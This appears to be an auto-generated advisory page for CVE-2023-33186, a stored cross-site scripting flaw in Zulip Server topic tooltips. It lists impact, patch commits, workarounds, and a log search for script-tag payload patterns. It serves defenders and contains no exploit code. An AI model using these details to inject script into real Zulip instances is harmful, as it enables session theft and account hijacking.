CVE-2023-33186 – This cross-site scripting (XSS) vulnerability i... (How to Fix)

Q: What is the severity of CVE-2023-33186?

CVE-2023-33186 has a CVSS score of 8.2 (HIGH). This cross-site scripting (XSS) vulnerability in Zulip Server allows attackers to inject malicious JavaScript into topic tooltips. When a victim hovers over a specially crafted topic in their message feed, the attacker's code executes in the victim's browser context. This affects Zulip instances running vulnerable development versions from May 2, 2023 onward.

📋 TL;DR

This cross-site scripting (XSS) vulnerability in Zulip Server allows attackers to inject malicious JavaScript into topic tooltips. When a victim hovers over a specially crafted topic in their message feed, the attacker's code executes in the victim's browser context. This affects Zulip instances running vulnerable development versions from May 2, 2023 onward.

💻 Affected Systems

Products:

Zulip Server

Versions: Main development branch from May 2, 2023 onward, including beta versions 7.0-beta1 and 7.0-beta2

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects development/beta versions; stable releases are not affected. Requires attacker to have message-sending privileges.

📦 What is this software?

Zulip Server by Zulip

View all CVEs affecting Zulip Server →

Zulip Server by Zulip

View all CVEs affecting Zulip Server →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as the victim, redirect to malicious sites, or compromise user accounts through credential theft.

🟠

Likely Case

Attackers with message-sending privileges could steal session tokens to hijack accounts, read private messages, or perform unauthorized actions within the victim's permissions.

🟢

If Mitigated

With proper input validation and output encoding, malicious JavaScript would be rendered harmless as plain text.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to send messages. The vulnerability is in tooltip rendering when hovering over topics.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Fixed in development branch commits after May 2, 2023

Vendor Advisory: https://github.com/zulip/zulip/security/advisories/GHSA-4r83-8f94-hrph

Restart Required: Yes

Instructions:

1. Update to latest development branch or wait for stable release 2. Apply commits 03cfb3d9fe61c975d133121ec31a7357f0c9e18f and 3ca131743b00f42bad8edbac4ef92656d954c629 3. Restart Zulip server

🔧 Temporary Workarounds

Disable topic tooltips

all

Temporarily disable JavaScript tooltips for message topics to prevent exploitation

Modify Zulip frontend code to remove tooltip functionality for topics

Restrict message sending

all

Limit who can send messages to reduce attack surface

Adjust Zulip permissions to restrict message creation to trusted users only

🧯 If You Can't Patch

Implement strict Content Security Policy (CSP) headers to block inline JavaScript execution
Monitor for unusual topic names containing script tags or JavaScript patterns

🔍 How to Verify

Check if Vulnerable:

Check if running development branch from May 2, 2023 or beta versions 7.0-beta1/7.0-beta2

Check Version:

Check Zulip version in /var/log/zulip/server.log or via management commands

Verify Fix Applied:

Verify commits 03cfb3d9fe61c975d133121ec31a7357f0c9e18f and 3ca131743b00f42bad8edbac4ef92656d954c629 are applied

📡 Detection & Monitoring

Log Indicators:

Unusual topic names containing script tags or JavaScript patterns
Multiple failed tooltip rendering attempts

Network Indicators:

Unexpected JavaScript execution from topic hover events
Suspicious outbound connections following topic interactions

SIEM Query:

Search for topic names containing '<script>', 'javascript:', or encoded payloads in Zulip logs

📊 Metadata

CVE ID: CVE-2023-33186

CVSS v3 Score: 8.2 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:L

CWE: CWE-79

Published: May 30, 2023

Last Updated: November 21, 2024

🔗 References

https://github.com/zulip/zulip/commit/03cfb3d9fe61c975d133121ec31a7357f0c9e18f
https://github.com/zulip/zulip/commit/3ca131743b00f42bad8edbac4ef92656d954c629 Patch
https://github.com/zulip/zulip/pull/25370 Issue Tracking,Patch
https://github.com/zulip/zulip/security/advisories/GHSA-4r83-8f94-hrph Vendor Advisory
https://github.com/zulip/zulip/commit/03cfb3d9fe61c975d133121ec31a7357f0c9e18f
https://github.com/zulip/zulip/commit/3ca131743b00f42bad8edbac4ef92656d954c629 Patch
https://github.com/zulip/zulip/pull/25370 Issue Tracking,Patch
https://github.com/zulip/zulip/security/advisories/GHSA-4r83-8f94-hrph Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-33186, you might also want to check these: